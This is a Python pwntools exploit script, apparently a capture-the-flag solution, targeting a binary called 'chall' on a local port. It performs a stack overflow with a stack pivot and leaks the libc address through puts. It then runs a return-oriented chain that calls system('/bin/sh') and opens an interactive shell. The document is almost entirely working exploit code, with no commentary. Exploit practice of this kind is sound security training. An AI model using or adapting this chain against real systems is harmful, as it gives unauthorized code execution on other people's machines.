2025-6

from pwn import * from icecream import ic import sys e = ELF("chall",checksec=False) libc = ELF("libc.so.6",checksec=False) ld = ELF("ld-linux-x86-64.so.2",checksec=False) nc = "nc 127.0.0.1 9999" if "nc" in nc: HOST = nc.split(" ")[1] PORT = int(nc.split(" ")[2]) if "http" in nc: from urllib.parse import urlparse HOST = urlparse(nc).hostname PORT = urlparse(nc).port dbg = 1 g_script = """ #set max-visualize-chunk-size 0x300 """ context.binary = e if len(sys.argv) > 1: io = remote(host=HOST,port=PORT) else: io = e.process() if dbg: gdb.attach(io,g_script) s = lambda b: io.send(b) sa = lambda a,b: io.sendafter(a,b) sl = lambda b: io.sendline(b) sln = lambda b: io.sendline(str(b).encode()) sla = lambda a,b: io.sendlineafter(a,b) r = lambda : io.recv() ru = lambda b:io.recvuntil(b) rl = lambda : io.recvline() pu32= lambda b : u32(b.ljust(4,b"\0")) pu64= lambda b : u64(b.ljust(8,b"\0")) hlog= lambda i : print(f"[*]{hex(i)}") fsp = lambda b : f"%{b}$p".encode() shell = lambda : io.interactive() payload = b"" def rst():global payload;payload = b"" def pay(*args, **kwargs): global payload; payload += b"".join([a if type(a) == bytes else (a.encode() if type(a) == str else p64(a)) for a in args]) ret2vuln = 0x00401225 pop_rdi = 0x00401214 pop_rbp = 0x00401281 leave_ret = 0x00401259 writable = 0x0000000000405000 - 0x800 ret = 0x00401290 rst() pay( b"A"*0x60, writable+0x60, ret2vuln ) ic(payload) ic(hex(len(payload))) sl(payload) rst() pay( writable+0x60, pop_rdi, e.got['puts'], e.plt['puts'], ret2vuln, ) payload = payload.ljust(0x60,b"B") pay( writable, leave_ret ) sl(payload) ic(rl()) ic(rl()) ic(rl()) leak = (rl()).strip() leak = pu64(leak) ic(hex(leak)) libc.address = leak - (0x7996a4687be0 - 0x00007996a4600000) ic(hex(libc.address)) rst() pay( writable+0x60, ret, pop_rbp, writable, pop_rdi, next(libc.search(b"/bin/sh")), libc.symbols['system'], ) payload += p64(ret)*((0x60 - len(payload))//8-2) pay( pop_rbp, writable+8, leave_ret ) ic(hex(len(payload))) sl(payload) shell()